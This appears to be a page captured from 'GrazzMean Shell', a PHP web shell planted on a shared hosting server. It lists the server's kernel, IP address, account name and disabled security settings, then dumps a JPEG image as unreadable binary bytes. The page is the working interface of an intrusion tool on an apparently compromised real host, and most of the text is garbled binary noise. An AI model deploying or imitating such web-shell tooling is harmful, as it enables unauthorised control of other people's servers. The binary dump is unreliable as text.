shell bypass 403

GrazzMean Shell

Uname: Linux premium264.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Software: LiteSpeed
PHP version: 8.3.22 [ PHP INFO ] PHP os: Linux
Server Ip: 69.57.162.13
Your Ip: 216.73.216.219
User: workvvfb (1129) | Group: workvvfb (1084)
Safe Mode: OFF
Disable Function:
NONE

name : 5-85x85.jpg
���JFIF��ExifII*��/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmpMM:InstanceID="xmp.iid:57EBFD1766D911EC97A2CA2FF238BD07" xmpMM:DocumentID="xmp.did:57EBFD1866D911EC97A2CA2FF238BD07"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:57EBFD1566D911EC97A2CA2FF238BD07" stRef:documentID="xmp.did:57EBFD1666D911EC97A2CA2FF238BD07"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��C				

!'"#%%%),($+!$%$��C				$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$��UU����(!1"AQ�2a������?�D�lo􀀀�������9�6C5��v+S��N+��:t�{�`}ĝh��A���lU�y��>��%��Y�
ƹ��}�O���G�lN=��֓��p6.3	��=�U�#�k���KHވH���V�w.����i��`dо#.��o`:�!�� �_(��m;7`v?(�?�AT�I���7��|}+A?�A��9��_��2��5�y{���6QY�$����O�ZU���3��-\�FC���&d����)6�z���j5���'e>
]��Y,ؒ]f�REJ�|o�>���J$}����Q����Q��Y��a���c���8������[Dʽ��sYp9��E��Yr���V0:�M��g��������.VK�y�:q�k�ݿڛ!lr���gH���}�=K�v�Dv/������.7)��E�o����9��Q#dk��6��"et�//��󳤾6�on�]�c��m쀃��H/V����4���p�p(1��Јҭb�����s��7�恩���d/���5�M�I�{��O)��y�q��h�����������������������������������������������������
© 2025 GrazzMean